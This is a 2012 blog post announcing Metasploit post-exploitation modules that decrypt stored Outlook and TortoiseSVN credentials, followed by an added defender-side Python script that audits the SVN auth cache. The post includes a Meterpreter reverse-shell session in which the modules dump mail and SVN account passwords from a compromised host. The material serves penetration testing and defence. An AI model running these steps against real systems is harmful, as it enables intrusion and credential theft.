Tuesday, June 26, 2012 At 2:40PM
Post exploitation is a critical component of any penetration test. In support of such activities we’ve recently committed a few updates to the post exploitation modules within Metasploit:
1) Microsoft Outlook Post Exploitation: This module extracts and decrypts credentials for stored e-mail accounts. This update contains better handling of outbound SMTP servers requiring authentication. This module has proven quite useful during numerous penetration tests.
2) TortoiseSVN Post Exploitation: This new module extracts and decrypts SVN credentials for stored accounts.
Such post modules can be utilized within Metasploit’s Meterpreter environment. The session below demonstrates their use through a reverse shell.
msf > use exploit/multi/handler
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.2.15:4444
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to 192.168.2.5
[*] Meterpreter session 1 opened (192.168.2.15:4444 -> 192.168.2.5:28765)
meterpreter > run post/windows/gather/credentials/outlook
[*] Searching for Microsoft Outlook in Registry…
[*] Microsoft Outlook found in Registry…
[+] Account Found:
[*] Type: IMAP
[*] User Display Name: John Smith
[*] User E-mail Address: [email protected]
[*] User Name: [email protected]
[*] User Password: password123
[*] Incoming Mail Server (IMAP): imap.test.com
[*] IMAP Use SSL: Yes
[*] IMAP Port: 993
[*] Outgoing Mail Server (SMTP): smtp.test.com [Authentication Required]
[*] Outgoing Mail Server (SMTP) User Name: [email protected]
[*] Outgoing Mail Server (SMTP) Password: password123
[*] SMTP Use SSL: Yes
[*] SMTP Port: 587
[*]
[*] Complete
meterpreter > run post/windows/gather/credentials/tortoisesvn
[*] Searching for TortoiseSVN…
[*] Checking for configuration files in: C:\Users\John\AppData\Roaming\Subversion\auth\svn.simple
[+] Account Found:
[*] URL: https://svn.test.com:443
[*] Realm: SVN Server
[*] User Name: jsmith
[*] Password: password123
[*]
[*] Complete
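From the defender's side, the same svn.simple cache shown in the session above can be inventoried without touching the secrets. The following is an added example, not part of the original post or of Metasploit: it parses Subversion's K/V auth-cache file format and reports which entries hold a cached password and under which passtype. The function names and the sample entry are constructed for illustration.

```python
import os
from pathlib import Path

def parse_svn_hash(data: bytes) -> dict:
    """Parse Subversion's auth-cache format: 'K n', key, 'V n', value, ..., 'END'."""
    fields, pos = {}, 0
    def read_item(tag: bytes) -> bytes:
        nonlocal pos
        eol = data.index(b"\n", pos)  # ValueError if the header line is cut off
        header = data[pos:eol].split()
        if len(header) != 2 or header[0] != tag or not header[1].isdigit():
            raise ValueError(f"expected {tag!r} header at offset {pos}")
        start, end = eol + 1, eol + 1 + int(header[1])
        if data[end:end + 1] != b"\n":  # declared length must match the data
            raise ValueError(f"bad length at offset {pos}")
        pos = end + 1
        return data[start:end]
    while not data.startswith(b"END", pos):
        key = read_item(b"K")
        fields[key.decode()] = read_item(b"V")
    return fields

def audit_entry(data: bytes) -> dict:
    """Summarise one cache file; the password value is never decoded or printed."""
    f = parse_svn_hash(data)
    passtype = f.get("passtype", b"").decode(errors="replace")
    cached = "password" in f
    return {"realm": f.get("svn:realmstring", b"").decode(errors="replace"),
            "username": f.get("username", b"").decode(errors="replace"),
            "passtype": passtype, "password_cached": cached,
            "plaintext_on_disk": cached and passtype == "simple"}

def audit_dir(auth_dir: Path) -> list:
    rows = []
    for p in sorted(q for q in auth_dir.iterdir() if q.is_file()):
        try:
            rows.append({"file": p.name, **audit_entry(p.read_bytes())})
        except ValueError as exc:  # malformed file: report it, keep going
            rows.append({"file": p.name, "error": str(exc)})
    return rows

# Constructed sample entry; the password value is a placeholder, not a real blob.
SAMPLE = (b"K 8\npasstype\nV 8\nwincrypt\nK 8\npassword\nV 16\nPLACEHOLDER-BLOB\n"
          b"K 15\nsvn:realmstring\nV 37\n<https://svn.test.com:443> SVN Server\n"
          b"K 8\nusername\nV 6\njsmith\nEND\n")

if __name__ == "__main__":
    auth = Path(os.environ.get("APPDATA", "")) / "Subversion" / "auth" / "svn.simple"
    for row in (audit_dir(auth) if auth.is_dir() else [audit_entry(SAMPLE)]):
        print(row)
```

Entries reported with `password_cached` set are the ones a post module of this kind would recover; TortoiseSVN's Saved Data settings page can clear the cached authentication data.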
Enjoy!
Author: Justin Cacak